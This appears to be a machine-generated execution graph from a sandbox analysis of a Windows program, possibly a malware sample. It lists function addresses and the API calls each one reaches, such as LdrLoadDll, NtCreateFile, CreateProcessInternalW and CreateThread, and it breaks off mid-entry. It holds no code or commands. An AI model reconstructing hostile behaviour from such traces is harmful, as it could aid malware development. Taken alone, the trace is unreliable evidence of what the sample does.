                                                                                                                                                      execution_graph 83228 2f37300 83231 2f3733b 83228->83231 83249 2f3a020 83228->83249 83230 2f3741c 83231->83230 83239 2f29b40 83231->83239 83233 2f37371 83244 2f33e50 83233->83244 83235 2f373a0 Sleep 83236 2f3738d 83235->83236 83236->83230 83236->83235 83252 2f36f30 LdrLoadDll 83236->83252 83253 2f37130 LdrLoadDll 83236->83253 83241 2f29b64 83239->83241 83240 2f29b6b 83240->83233 83241->83240 83242 2f29ba0 LdrLoadDll 83241->83242 83243 2f29bb7 83241->83243 83242->83243 83243->83233 83245 2f33e6a 83244->83245 83246 2f33e5e 83244->83246 83245->83236 83246->83245 83254 2f342d0 LdrLoadDll 83246->83254 83248 2f33fbc 83248->83236 83255 2f387c0 83249->83255 83252->83236 83253->83236 83254->83248 83256 2f387dc 83255->83256 83258 2f391e0 83255->83258 83256->83231 83259 2f391f0 83258->83259 83260 2f39212 83258->83260 83261 2f33e50 LdrLoadDll 83259->83261 83260->83256 83261->83260 83262 3a529f0 LdrInitializeThunk 83265 2f3d43d 83268 2f39c80 83265->83268 83269 2f39ca6 83268->83269 83276 2f28b60 83269->83276 83271 2f39cb2 83274 2f39cd6 83271->83274 83284 2f27e40 83271->83284 83316 2f38930 83274->83316 83319 2f28ab0 83276->83319 83278 2f28b6d 83279 2f28b74 83278->83279 83331 2f28a50 83278->83331 83279->83271 83285 2f27e67 83284->83285 83728 2f2a010 83285->83728 83287 2f27e79 83732 2f29d60 83287->83732 83289 2f27e96 83291 2f27e9d 83289->83291 83783 2f29c90 LdrLoadDll 83289->83783 83313 2f27fe4 83291->83313 83736 2f2d170 83291->83736 83293 2f27f06 83294 2f3a270 2 API calls 83293->83294 83293->83313 83295 2f27f1c 83294->83295 83296 2f3a270 2 API calls 83295->83296 83297 2f27f2d 83296->83297 83298 2f3a270 2 API calls 83297->83298 83299 2f27f3e 83298->83299 83748 2f2aed0 83299->83748 83301 2f27f51 83302 2f33a50 8 API calls 83301->83302 83303 2f27f62 83302->83303 83304 2f33a50 8 API calls 83303->83304 83305 2f27f73 83304->83305 83306 2f27f93 83305->83306 83760 2f2ba40 83305->83760 83308 2f33a50 8 API calls 83306->83308 83311 2f27fdb 83306->83311 83314 2f27faa 83308->83314 83766 2f27c70 83311->83766 83313->83274 83314->83311 83785 2f2bae0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 83314->83785 83317 2f391e0 LdrLoadDll 83316->83317 83318 2f3894f 83317->83318 83350 2f36e50 83319->83350 83323 2f28ad6 83323->83278 83324 2f28acc 83324->83323 83357 2f39530 83324->83357 83326 2f28b13 83326->83323 83368 2f288d0 83326->83368 83328 2f28b33 83374 2f28320 LdrLoadDll 83328->83374 83330 2f28b45 83330->83278 83707 2f39820 83331->83707 83334 2f39820 LdrLoadDll 83335 2f28a7b 83334->83335 83336 2f39820 LdrLoadDll 83335->83336 83337 2f28a91 83336->83337 83338 2f2cf70 83337->83338 83339 2f2cf89 83338->83339 83711 2f29e90 83339->83711 83341 2f2cf9c 83715 2f38460 83341->83715 83345 2f2cfc2 83346 2f2cfed 83345->83346 83721 2f384e0 83345->83721 83348 2f38710 2 API calls 83346->83348 83349 2f28b85 83348->83349 83349->83271 83351 2f36e5f 83350->83351 83352 2f33e50 LdrLoadDll 83351->83352 83353 2f28ac3 83352->83353 83354 2f36d00 83353->83354 83375 2f38880 83354->83375 83358 2f39549 83357->83358 83378 2f33a50 83358->83378 83360 2f39561 83361 2f3956a 83360->83361 83417 2f39370 83360->83417 83361->83326 83363 2f3957e 83363->83361 83435 2f38180 83363->83435 83685 2f26e20 83368->83685 83370 2f288f1 83370->83328 83371 2f288ea 83371->83370 83698 2f270e0 83371->83698 83374->83330 83376 2f391e0 LdrLoadDll 83375->83376 83377 2f36d15 83376->83377 83377->83324 83379 2f33d85 83378->83379 83380 2f33a64 83378->83380 83379->83360 83380->83379 83443 2f37ed0 83380->83443 83383 2f33b73 83503 2f386e0 LdrLoadDll 83383->83503 83384 2f33b90 83446 2f385e0 83384->83446 83387 2f33b7d 83387->83360 83388 2f33bb7 83389 2f3a0a0 2 API calls 83388->83389 83391 2f33bc3 83389->83391 83390 2f33d49 83393 2f38710 2 API calls 83390->83393 83391->83387 83391->83390 83392 2f33d5f 83391->83392 83397 2f33c52 83391->83397 83512 2f33790 LdrLoadDll NtReadFile NtClose 83392->83512 83394 2f33d50 83393->83394 83394->83360 83396 2f33d72 83396->83360 83398 2f33cb9 83397->83398 83400 2f33c61 83397->83400 83398->83390 83399 2f33ccc 83398->83399 83505 2f38560 83399->83505 83402 2f33c66 83400->83402 83403 2f33c7a 83400->83403 83504 2f33650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83402->83504 83406 2f33c97 83403->83406 83407 2f33c7f 83403->83407 83406->83394 83461 2f33410 83406->83461 83449 2f336f0 83407->83449 83409 2f33c70 83409->83360 83411 2f33c8d 83411->83360 83413 2f33d2c 83509 2f38710 83413->83509 83414 2f33caf 83414->83360 83416 2f33d38 83416->83360 83418 2f39381 83417->83418 83419 2f39393 83418->83419 83420 2f3a020 LdrLoadDll 83418->83420 83419->83363 83421 2f393b4 83420->83421 83530 2f33060 83421->83530 83423 2f39400 83423->83363 83424 2f393d7 83424->83423 83425 2f33060 3 API calls 83424->83425 83427 2f393f9 83425->83427 83427->83423 83562 2f34390 83427->83562 83428 2f3948a 83429 2f3949a 83428->83429 83656 2f39180 LdrLoadDll 83428->83656 83572 2f38ff0 83429->83572 83432 2f394c8 83651 2f38140 83432->83651 83436 2f391e0 LdrLoadDll 83435->83436 83437 2f3819c 83436->83437 83679 3a52b2a 83437->83679 83438 2f381b7 83440 2f3a0a0 83438->83440 83682 2f388f0 83440->83682 83442 2f395d9 83442->83326 83444 2f391e0 LdrLoadDll 83443->83444 83445 2f33b44 83444->83445 83445->83383 83445->83384 83445->83387 83447 2f391e0 LdrLoadDll 83446->83447 83448 2f385fc NtCreateFile 83447->83448 83448->83388 83450 2f3370c 83449->83450 83451 2f38560 LdrLoadDll 83450->83451 83452 2f3372d 83451->83452 83453 2f33734 83452->83453 83454 2f33748 83452->83454 83455 2f38710 2 API calls 83453->83455 83456 2f38710 2 API calls 83454->83456 83457 2f3373d 83455->83457 83458 2f33751 83456->83458 83457->83411 83513 2f3a2b0 LdrLoadDll RtlAllocateHeap 83458->83513 83460 2f3375c 83460->83411 83462 2f3345b 83461->83462 83463 2f3348e 83461->83463 83464 2f38560 LdrLoadDll 83462->83464 83465 2f335d9 83463->83465 83469 2f334aa 83463->83469 83466 2f33476 83464->83466 83467 2f38560 LdrLoadDll 83465->83467 83468 2f38710 2 API calls 83466->83468 83476 2f335f4 83467->83476 83471 2f3347f 83468->83471 83470 2f38560 LdrLoadDll 83469->83470 83472 2f334c5 83470->83472 83471->83414 83474 2f334e1 83472->83474 83475 2f334cc 83472->83475 83479 2f334e6 83474->83479 83480 2f334fc 83474->83480 83478 2f38710 2 API calls 83475->83478 83526 2f385a0 LdrLoadDll 83476->83526 83477 2f3362e 83481 2f38710 2 API calls 83477->83481 83482 2f334d5 83478->83482 83483 2f38710 2 API calls 83479->83483 83488 2f33501 83480->83488 83514 2f3a270 83480->83514 83484 2f33639 83481->83484 83482->83414 83485 2f334ef 83483->83485 83484->83414 83485->83414 83497 2f33513 83488->83497 83517 2f38690 83488->83517 83489 2f33567 83490 2f3357e 83489->83490 83525 2f38520 LdrLoadDll 83489->83525 83492 2f33585 83490->83492 83493 2f3359a 83490->83493 83494 2f38710 2 API calls 83492->83494 83495 2f38710 2 API calls 83493->83495 83494->83497 83496 2f335a3 83495->83496 83498 2f335cf 83496->83498 83520 2f39e70 83496->83520 83497->83414 83498->83414 83500 2f335ba 83501 2f3a0a0 2 API calls 83500->83501 83502 2f335c3 83501->83502 83502->83414 83503->83387 83504->83409 83506 2f391e0 LdrLoadDll 83505->83506 83507 2f33d14 83506->83507 83508 2f385a0 LdrLoadDll 83507->83508 83508->83413 83510 2f391e0 LdrLoadDll 83509->83510 83511 2f3872c NtClose 83510->83511 83511->83416 83512->83396 83513->83460 83527 2f388b0 83514->83527 83516 2f3a288 83516->83488 83518 2f391e0 LdrLoadDll 83517->83518 83519 2f386ac NtReadFile 83518->83519 83519->83489 83521 2f39e94 83520->83521 83522 2f39e7d 83520->83522 83521->83500 83522->83521 83523 2f3a270 2 API calls 83522->83523 83524 2f39eab 83523->83524 83524->83500 83525->83490 83526->83477 83528 2f391e0 LdrLoadDll 83527->83528 83529 2f388cc RtlAllocateHeap 83528->83529 83529->83516 83531 2f33071 83530->83531 83532 2f33079 83530->83532 83531->83424 83561 2f3334c 83532->83561 83657 2f3b250 83532->83657 83534 2f330cd 83535 2f3b250 2 API calls 83534->83535 83539 2f330d8 83535->83539 83536 2f33126 83538 2f3b250 2 API calls 83536->83538 83542 2f3313a 83538->83542 83539->83536 83540 2f3b380 3 API calls 83539->83540 83671 2f3b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 83539->83671 83540->83539 83541 2f33197 83543 2f3b250 2 API calls 83541->83543 83542->83541 83662 2f3b380 83542->83662 83549 2f331ad 83543->83549 83545 2f331ea 83546 2f3b250 2 API calls 83545->83546 83548 2f331f5 83546->83548 83547 2f3b380 3 API calls 83547->83549 83550 2f3b380 3 API calls 83548->83550 83557 2f3322f 83548->83557 83549->83545 83549->83547 83550->83548 83553 2f3b2b0 2 API calls 83554 2f3332e 83553->83554 83555 2f3b2b0 2 API calls 83554->83555 83556 2f33338 83555->83556 83558 2f3b2b0 2 API calls 83556->83558 83668 2f3b2b0 83557->83668 83559 2f33342 83558->83559 83560 2f3b2b0 2 API calls 83559->83560 83560->83561 83561->83424 83563 2f343a1 83562->83563 83564 2f33a50 8 API calls 83563->83564 83565 2f343b7 83564->83565 83566 2f343f2 83565->83566 83567 2f34405 83565->83567 83571 2f3440a 83565->83571 83568 2f3a0a0 2 API calls 83566->83568 83569 2f3a0a0 2 API calls 83567->83569 83570 2f343f7 83568->83570 83569->83571 83570->83428 83571->83428 83672 2f38eb0 83572->83672 83575 2f38eb0 LdrLoadDll 83576 2f3900d 83575->83576 83577 2f38eb0 LdrLoadDll 83576->83577 83578 2f39016 83577->83578 83579 2f38eb0 LdrLoadDll 83578->83579 83580 2f3901f 83579->83580 83581 2f38eb0 LdrLoadDll 83580->83581 83582 2f39028 83581->83582 83583 2f38eb0 LdrLoadDll 83582->83583 83584 2f39031 83583->83584 83585 2f38eb0 LdrLoadDll 83584->83585 83586 2f3903d 83585->83586 83587 2f38eb0 LdrLoadDll 83586->83587 83588 2f39046 83587->83588 83589 2f38eb0 LdrLoadDll 83588->83589 83590 2f3904f 83589->83590 83591 2f38eb0 LdrLoadDll 83590->83591 83592 2f39058 83591->83592 83593 2f38eb0 LdrLoadDll 83592->83593 83594 2f39061 83593->83594 83595 2f38eb0 LdrLoadDll 83594->83595 83596 2f3906a 83595->83596 83597 2f38eb0 LdrLoadDll 83596->83597 83598 2f39076 83597->83598 83599 2f38eb0 LdrLoadDll 83598->83599 83600 2f3907f 83599->83600 83601 2f38eb0 LdrLoadDll 83600->83601 83602 2f39088 83601->83602 83603 2f38eb0 LdrLoadDll 83602->83603 83604 2f39091 83603->83604 83605 2f38eb0 LdrLoadDll 83604->83605 83606 2f3909a 83605->83606 83607 2f38eb0 LdrLoadDll 83606->83607 83608 2f390a3 83607->83608 83609 2f38eb0 LdrLoadDll 83608->83609 83610 2f390af 83609->83610 83611 2f38eb0 LdrLoadDll 83610->83611 83612 2f390b8 83611->83612 83613 2f38eb0 LdrLoadDll 83612->83613 83614 2f390c1 83613->83614 83615 2f38eb0 LdrLoadDll 83614->83615 83616 2f390ca 83615->83616 83617 2f38eb0 LdrLoadDll 83616->83617 83618 2f390d3 83617->83618 83619 2f38eb0 LdrLoadDll 83618->83619 83620 2f390dc 83619->83620 83621 2f38eb0 LdrLoadDll 83620->83621 83622 2f390e8 83621->83622 83623 2f38eb0 LdrLoadDll 83622->83623 83624 2f390f1 83623->83624 83625 2f38eb0 LdrLoadDll 83624->83625 83626 2f390fa 83625->83626 83627 2f38eb0 LdrLoadDll 83626->83627 83628 2f39103 83627->83628 83629 2f38eb0 LdrLoadDll 83628->83629 83630 2f3910c 83629->83630 83631 2f38eb0 LdrLoadDll 83630->83631 83632 2f39115 83631->83632 83633 2f38eb0 LdrLoadDll 83632->83633 83634 2f39121 83633->83634 83635 2f38eb0 LdrLoadDll 83634->83635 83636 2f3912a 83635->83636 83637 2f38eb0 LdrLoadDll 83636->83637 83638 2f39133 83637->83638 83639 2f38eb0 LdrLoadDll 83638->83639 83640 2f3913c 83639->83640 83641 2f38eb0 LdrLoadDll 83640->83641 83642 2f39145 83641->83642 83643 2f38eb0 LdrLoadDll 83642->83643 83644 2f3914e 83643->83644 83645 2f38eb0 LdrLoadDll 83644->83645 83646 2f3915a 83645->83646 83647 2f38eb0 LdrLoadDll 83646->83647 83648 2f39163 83647->83648 83649 2f38eb0 LdrLoadDll 83648->83649 83650 2f3916c 83649->83650 83650->83432 83652 2f391e0 LdrLoadDll 83651->83652 83653 2f3815c 83652->83653 83678 3a52d10 LdrInitializeThunk 83653->83678 83654 2f38173 83654->83363 83656->83429 83658 2f3b260 83657->83658 83659 2f3b266 83657->83659 83658->83534 83660 2f3a270 2 API calls 83659->83660 83661 2f3b28c 83660->83661 83661->83534 83663 2f3b2f0 83662->83663 83664 2f3a270 2 API calls 83663->83664 83665 2f3b34d 83663->83665 83666 2f3b32a 83664->83666 83665->83542 83667 2f3a0a0 2 API calls 83666->83667 83667->83665 83669 2f3a0a0 2 API calls 83668->83669 83670 2f33324 83669->83670 83670->83553 83671->83539 83673 2f38ecb 83672->83673 83674 2f33e50 LdrLoadDll 83673->83674 83675 2f38eeb 83674->83675 83676 2f33e50 LdrLoadDll 83675->83676 83677 2f38f97 83675->83677 83676->83677 83677->83575 83678->83654 83680 3a52b31 83679->83680 83681 3a52b3f LdrInitializeThunk 83679->83681 83680->83438 83681->83438 83683 2f391e0 LdrLoadDll 83682->83683 83684 2f3890c RtlFreeHeap 83683->83684 83684->83442 83686 2f26e30 83685->83686 83687 2f26e2b 83685->83687 83688 2f3a020 LdrLoadDll 83686->83688 83687->83371 83689 2f26e55 83688->83689 83690 2f26eb8 83689->83690 83691 2f38140 2 API calls 83689->83691 83692 2f26ebe 83689->83692 83696 2f3a020 LdrLoadDll 83689->83696 83701 2f38840 83689->83701 83690->83371 83691->83689 83694 2f26ee4 83692->83694 83695 2f38840 2 API calls 83692->83695 83694->83371 83697 2f26ed5 83695->83697 83696->83689 83697->83371 83699 2f38840 2 API calls 83698->83699 83700 2f270fe 83699->83700 83700->83328 83702 2f391e0 LdrLoadDll 83701->83702 83703 2f3885c 83702->83703 83706 3a52b90 LdrInitializeThunk 83703->83706 83704 2f38873 83704->83689 83706->83704 83708 2f39843 83707->83708 83709 2f29b40 LdrLoadDll 83708->83709 83710 2f28a6a 83709->83710 83710->83334 83712 2f29eb3 83711->83712 83714 2f29f30 83712->83714 83726 2f37f10 LdrLoadDll 83712->83726 83714->83341 83716 2f391e0 LdrLoadDll 83715->83716 83717 2f2cfab 83716->83717 83717->83349 83718 2f38a50 83717->83718 83719 2f391e0 LdrLoadDll 83718->83719 83720 2f38a6f LookupPrivilegeValueW 83719->83720 83720->83345 83722 2f391e0 LdrLoadDll 83721->83722 83723 2f384fc 83722->83723 83727 3a52dc0 LdrInitializeThunk 83723->83727 83724 2f3851b 83724->83346 83726->83714 83727->83724 83729 2f2a037 83728->83729 83730 2f29e90 LdrLoadDll 83729->83730 83731 2f2a066 83730->83731 83731->83287 83733 2f29d84 83732->83733 83786 2f37f10 LdrLoadDll 83733->83786 83735 2f29dbe 83735->83289 83737 2f2d19c 83736->83737 83738 2f2a010 LdrLoadDll 83737->83738 83739 2f2d1ae 83738->83739 83787 2f2d080 83739->83787 83742 2f2d1e1 83745 2f2d1f2 83742->83745 83747 2f38710 2 API calls 83742->83747 83743 2f2d1c9 83744 2f2d1d4 83743->83744 83746 2f38710 2 API calls 83743->83746 83744->83293 83745->83293 83746->83744 83747->83745 83749 2f2aee6 83748->83749 83750 2f2aef0 83748->83750 83749->83301 83751 2f29e90 LdrLoadDll 83750->83751 83752 2f2af61 83751->83752 83753 2f29d60 LdrLoadDll 83752->83753 83754 2f2af75 83753->83754 83755 2f2af98 83754->83755 83756 2f29e90 LdrLoadDll 83754->83756 83755->83301 83757 2f2afb4 83756->83757 83758 2f33a50 8 API calls 83757->83758 83759 2f2b009 83758->83759 83759->83301 83761 2f2ba66 83760->83761 83762 2f29e90 LdrLoadDll 83761->83762 83763 2f2ba7a 83762->83763 83806 2f2b730 83763->83806 83765 2f27f8c 83784 2f2b020 LdrLoadDll 83765->83784 83836 2f2d430 83766->83836 83768 2f27c83 83779 2f27e31 83768->83779 83841 2f333a0 83768->83841 83770 2f27ce2 83770->83779 83844 2f27a20 83770->83844 83773 2f3b250 2 API calls 83774 2f27d29 83773->83774 83775 2f3b380 3 API calls 83774->83775 83777 2f27d3e 83775->83777 83776 2f26e20 3 API calls 83776->83777 83777->83776 83777->83779 83782 2f270e0 2 API calls 83777->83782 83849 2f2ac00 83777->83849 83899 2f2d3d0 83777->83899 83903 2f2ceb0 83777->83903 83779->83313 83782->83777 83783->83291 83784->83306 83785->83311 83786->83735 83788 2f2d09a 83787->83788 83796 2f2d150 83787->83796 83789 2f29e90 LdrLoadDll 83788->83789 83790 2f2d0bc 83789->83790 83797 2f381c0 83790->83797 83792 2f2d0fe 83800 2f38200 83792->83800 83795 2f38710 2 API calls 83795->83796 83796->83742 83796->83743 83798 2f391e0 LdrLoadDll 83797->83798 83799 2f381dc 83798->83799 83799->83792 83801 2f391e0 LdrLoadDll 83800->83801 83802 2f3821c 83801->83802 83805 3a534e0 LdrInitializeThunk 83802->83805 83803 2f2d144 83803->83795 83805->83803 83807 2f2b747 83806->83807 83815 2f2d470 83807->83815 83811 2f2b7bb 83812 2f2b7c2 83811->83812 83827 2f38520 LdrLoadDll 83811->83827 83812->83765 83814 2f2b7d5 83814->83765 83816 2f2d495 83815->83816 83828 2f27120 83816->83828 83818 2f2d4b9 83819 2f2b78f 83818->83819 83820 2f33a50 8 API calls 83818->83820 83822 2f3a0a0 2 API calls 83818->83822 83835 2f2d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 83818->83835 83823 2f38960 83819->83823 83820->83818 83822->83818 83824 2f391e0 LdrLoadDll 83823->83824 83825 2f3897f CreateProcessInternalW 83824->83825 83825->83811 83827->83814 83829 2f2721f 83828->83829 83830 2f27135 83828->83830 83829->83818 83830->83829 83831 2f33a50 8 API calls 83830->83831 83832 2f271a2 83831->83832 83833 2f3a0a0 2 API calls 83832->83833 83834 2f271c9 83832->83834 83833->83834 83834->83818 83835->83818 83837 2f33e50 LdrLoadDll 83836->83837 83838 2f2d44f 83837->83838 83839 2f2d456 SetErrorMode 83838->83839 83840 2f2d45d 83838->83840 83839->83840 83840->83768 83919 2f2d200 83841->83919 83843 2f333c6 83843->83770 83845 2f3a020 LdrLoadDll 83844->83845 83848 2f27a45 83845->83848 83846 2f27c5a 83846->83773 83848->83846 83938 2f37b00 83848->83938 83850 2f2ac1f 83849->83850 83851 2f2ac19 83849->83851 83995 2f28620 83850->83995 83986 2f2ccc0 83851->83986 83854 2f2ac2c 83855 2f2aeb8 83854->83855 83856 2f3b380 3 API calls 83854->83856 83855->83777 83857 2f2ac48 83856->83857 83858 2f2ac5c 83857->83858 83859 2f2d3d0 2 API calls 83857->83859 84004 2f37f90 83858->84004 83859->83858 83862 2f2ad86 84020 2f2aba0 LdrLoadDll LdrInitializeThunk 83862->84020 83863 2f38180 2 API calls 83864 2f2acda 83863->83864 83864->83862 83871 2f2ace6 83864->83871 83866 2f2ada5 83867 2f2adad 83866->83867 84021 2f2ab10 LdrLoadDll NtClose LdrInitializeThunk 83866->84021 83868 2f38710 2 API calls 83867->83868 83873 2f2adb7 83868->83873 83870 2f2ad2f 83872 2f38710 2 API calls 83870->83872 83871->83855 83871->83870 83875 2f38290 2 API calls 83871->83875 83876 2f2ad4c 83872->83876 83873->83777 83874 2f2adcf 83874->83867 83877 2f2add6 83874->83877 83875->83870 84007 2f375b0 83876->84007 83879 2f2adee 83877->83879 84022 2f2aa90 83877->84022 84025 2f38010 LdrLoadDll 83879->84025 83880 2f2ad63 83880->83855 84010 2f27280 83880->84010 83883 2f2ae02 84026 2f2a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83883->84026 83886 2f2ae26 83888 2f2ae73 83886->83888 84027 2f38040 LdrLoadDll 83886->84027 84029 2f380a0 LdrLoadDll 83888->84029 83891 2f2ae44 83891->83888 84028 2f380d0 LdrLoadDll 83891->84028 83892 2f2ae81 83893 2f38710 2 API calls 83892->83893 83894 2f2ae8b 83893->83894 83895 2f38710 2 API calls 83894->83895 83897 2f2ae95 83895->83897 83897->83855 83898 2f27280 3 API calls 83897->83898 83898->83855 83900 2f2d3e3 83899->83900 84096 2f38110 83900->84096 83904 2f2cec0 83903->83904 83905 2f2cef8 83903->83905 83904->83905 83907 2f2ceef 83904->83907 84102 2f2bd30 83904->84102 83906 2f2cf13 83905->83906 83918 2f2cf48 83905->83918 84157 2f2cc60 10 API calls 83905->84157 84135 2f2cbe0 83906->84135 84117 2f2cd10 83907->84117 83914 2f2cf57 83914->83777 83917 2f33a50 8 API calls 83917->83918 84158 2f24360 24 API calls 83918->84158 83920 2f2d21d 83919->83920 83926 2f38240 83920->83926 83923 2f2d265 83923->83843 83927 2f3825c 83926->83927 83928 2f391e0 LdrLoadDll 83926->83928 83936 3a52e50 LdrInitializeThunk 83927->83936 83928->83927 83929 2f2d25e 83929->83923 83931 2f38290 83929->83931 83932 2f391e0 LdrLoadDll 83931->83932 83933 2f382ac 83932->83933 83937 3a52c30 LdrInitializeThunk 83933->83937 83934 2f2d28e 83934->83843 83936->83929 83937->83934 83939 2f3a270 2 API calls 83938->83939 83940 2f37b17 83939->83940 83959 2f28160 83940->83959 83942 2f37b32 83943 2f37b70 83942->83943 83944 2f37b59 83942->83944 83947 2f3a020 LdrLoadDll 83943->83947 83945 2f3a0a0 2 API calls 83944->83945 83946 2f37b66 83945->83946 83946->83846 83948 2f37baa 83947->83948 83949 2f3a020 LdrLoadDll 83948->83949 83950 2f37bc3 83949->83950 83956 2f37e64 83950->83956 83965 2f3a060 LdrLoadDll 83950->83965 83952 2f37e49 83953 2f37e50 83952->83953 83952->83956 83954 2f3a0a0 2 API calls 83953->83954 83955 2f37e5a 83954->83955 83955->83846 83957 2f3a0a0 2 API calls 83956->83957 83958 2f37eb9 83957->83958 83958->83846 83960 2f28185 83959->83960 83961 2f29b40 LdrLoadDll 83960->83961 83962 2f281b8 83961->83962 83964 2f281dd 83962->83964 83966 2f2b340 83962->83966 83964->83942 83965->83952 83967 2f2b36c 83966->83967 83968 2f38460 LdrLoadDll 83967->83968 83969 2f2b385 83968->83969 83970 2f2b38c 83969->83970 83977 2f384a0 83969->83977 83970->83964 83974 2f2b3c7 83975 2f38710 2 API calls 83974->83975 83976 2f2b3ea 83975->83976 83976->83964 83978 2f391e0 LdrLoadDll 83977->83978 83979 2f384bc 83978->83979 83985 3a52bc0 LdrInitializeThunk 83979->83985 83980 2f2b3af 83980->83970 83982 2f38a90 83980->83982 83983 2f391e0 LdrLoadDll 83982->83983 83984 2f38aaf 83983->83984 83984->83974 83985->83980 84030 2f2bdb0 83986->84030 83988 2f2ccd7 83989 2f2ccf0 83988->83989 84043 2f23d70 83988->84043 83991 2f3a270 2 API calls 83989->83991 83993 2f2ccfe 83991->83993 83992 2f2ccea 84067 2f37430 83992->84067 83993->83850 83996 2f2863b 83995->83996 83997 2f2d080 3 API calls 83996->83997 84003 2f2875b 83996->84003 84000 2f2873c 83997->84000 83998 2f2876a 83998->83854 83999 2f28751 84095 2f25ea0 LdrLoadDll 83999->84095 84000->83998 84000->83999 84001 2f38710 2 API calls 84000->84001 84001->83999 84003->83854 84005 2f391e0 LdrLoadDll 84004->84005 84006 2f2acb0 84005->84006 84006->83855 84006->83862 84006->83863 84008 2f2d3d0 2 API calls 84007->84008 84009 2f375e2 84008->84009 84009->83880 84011 2f27298 84010->84011 84012 2f29b40 LdrLoadDll 84011->84012 84013 2f272b3 84012->84013 84014 2f33e50 LdrLoadDll 84013->84014 84015 2f272c3 84014->84015 84016 2f272fd 84015->84016 84017 2f272cc PostThreadMessageW 84015->84017 84016->83777 84017->84016 84018 2f272e0 84017->84018 84019 2f272ea PostThreadMessageW 84018->84019 84019->84016 84020->83866 84021->83874 84023 2f38290 2 API calls 84022->84023 84024 2f2aace 84023->84024 84024->83879 84025->83883 84026->83886 84027->83891 84028->83888 84029->83892 84031 2f2bde3 84030->84031 84072 2f2a150 84031->84072 84033 2f2bdf5 84076 2f2a2c0 84033->84076 84035 2f2be13 84036 2f2a2c0 LdrLoadDll 84035->84036 84037 2f2be29 84036->84037 84038 2f2d200 3 API calls 84037->84038 84039 2f2be4d 84038->84039 84040 2f2be54 84039->84040 84079 2f3a2b0 LdrLoadDll RtlAllocateHeap 84039->84079 84040->83988 84042 2f2be64 84042->83988 84044 2f23d7d 84043->84044 84045 2f2b340 3 API calls 84044->84045 84047 2f23e61 84045->84047 84046 2f23e68 84046->83992 84047->84046 84080 2f3a2f0 84047->84080 84049 2f23ec9 84050 2f29e90 LdrLoadDll 84049->84050 84051 2f23fd3 84050->84051 84052 2f29e90 LdrLoadDll 84051->84052 84053 2f23ff7 84052->84053 84084 2f2b400 84053->84084 84057 2f24083 84058 2f3a020 LdrLoadDll 84057->84058 84059 2f24110 84058->84059 84060 2f3a020 LdrLoadDll 84059->84060 84062 2f2412a 84060->84062 84061 2f242a6 84061->83992 84062->84061 84063 2f29e90 LdrLoadDll 84062->84063 84064 2f2416a 84063->84064 84065 2f29d60 LdrLoadDll 84064->84065 84066 2f2420a 84065->84066 84066->83992 84068 2f33e50 LdrLoadDll 84067->84068 84070 2f37451 84068->84070 84069 2f37477 84069->83989 84070->84069 84071 2f37464 CreateThread 84070->84071 84071->83989 84073 2f2a177 84072->84073 84074 2f29e90 LdrLoadDll 84073->84074 84075 2f2a1b3 84074->84075 84075->84033 84077 2f29e90 LdrLoadDll 84076->84077 84078 2f2a2d9 84077->84078 84078->84035 84079->84042 84081 2f3a2fd 84080->84081 84082 2f33e50 LdrLoadDll 84081->84082 84083 2f3a310 84082->84083 84083->84049 84085 2f2b425 84084->84085 84089 2f38310 84085->84089 84088 2f383a0 LdrLoadDll 84088->84057 84090 2f391e0 LdrLoadDll 84089->84090 84091 2f3832c 84090->84091 84092 2f2405c 84091->84092 84094 3a52b80 LdrInitializeThunk 84091->84094 84092->84057 84092->84088 84094->84092 84095->84003 84097 2f391e0 LdrLoadDll 84096->84097 84098 2f3812c 84097->84098 84101 3a52cf0 LdrInitializeThunk 84098->84101 84099 2f2d40e 84099->83777 84101->84099 84103 2f2bd40 84102->84103 84104 2f2bda5 84102->84104 84103->84104 84159 2f2d010 84103->84159 84104->83907 84106 2f2bd50 84107 2f33a50 8 API calls 84106->84107 84108 2f2bd61 84107->84108 84109 2f33a50 8 API calls 84108->84109 84110 2f2bd6c 84109->84110 84111 2f2bd7a 84110->84111 84167 2f2b7f0 84110->84167 84113 2f33a50 8 API calls 84111->84113 84114 2f2bd88 84113->84114 84115 2f33a50 8 API calls 84114->84115 84116 2f2bd93 84115->84116 84116->83907 84118 2f2cd40 84117->84118 84218 2f32d60 84118->84218 84120 2f2cd81 84256 2f31a50 84120->84256 84122 2f2cd87 84292 2f2ed00 84122->84292 84124 2f2cd8d 84315 2f30bd0 84124->84315 84126 2f2cd95 84347 2f31d70 84126->84347 84130 2f2cda1 84381 2f323e0 84130->84381 84132 2f2cda7 84407 2f2d720 84132->84407 84136 2f2cbf8 84135->84136 84140 2f2cc49 84135->84140 84137 2f2db00 8 API calls 84136->84137 84136->84140 84138 2f2cc33 84137->84138 84138->84140 84593 2f2dd50 84138->84593 84140->83914 84141 2f2ca20 84140->84141 84142 2f2ca3c 84141->84142 84145 2f2cb1b 84141->84145 84143 2f38710 2 API calls 84142->84143 84142->84145 84148 2f2ca57 84143->84148 84144 2f2cbce 84144->83917 84144->83918 84154 2f2cbb1 84145->84154 84650 2f2b570 84145->84650 84146 2f33a50 8 API calls 84146->84144 84150 2f2b570 3 API calls 84148->84150 84149 2f2cb8b 84152 2f2b7f0 5 API calls 84149->84152 84149->84154 84151 2f2ca8f 84150->84151 84153 2f29e90 LdrLoadDll 84151->84153 84152->84154 84155 2f2caa0 84153->84155 84154->84144 84154->84146 84156 2f29e90 LdrLoadDll 84155->84156 84156->84145 84157->83906 84158->83914 84160 2f38460 LdrLoadDll 84159->84160 84161 2f2d037 84160->84161 84162 2f2d03e 84161->84162 84163 2f384a0 2 API calls 84161->84163 84162->84106 84164 2f2d05c 84163->84164 84165 2f38710 2 API calls 84164->84165 84166 2f2d068 84165->84166 84166->84106 84168 2f2b815 84167->84168 84169 2f2b823 84168->84169 84170 2f2b837 84168->84170 84171 2f29e90 LdrLoadDll 84169->84171 84172 2f29e90 LdrLoadDll 84170->84172 84174 2f2b832 84171->84174 84173 2f2b846 84172->84173 84176 2f2b340 3 API calls 84173->84176 84175 2f29e90 LdrLoadDll 84174->84175 84177 2f2ba34 84174->84177 84178 2f2b8a6 84175->84178 84176->84174 84177->84111 84179 2f29e90 LdrLoadDll 84178->84179 84180 2f2b8d7 84179->84180 84181 2f2b9d0 84180->84181 84182 2f2b400 2 API calls 84180->84182 84183 2f2b400 2 API calls 84181->84183 84185 2f2b8fa 84182->84185 84184 2f2b9e9 84183->84184 84208 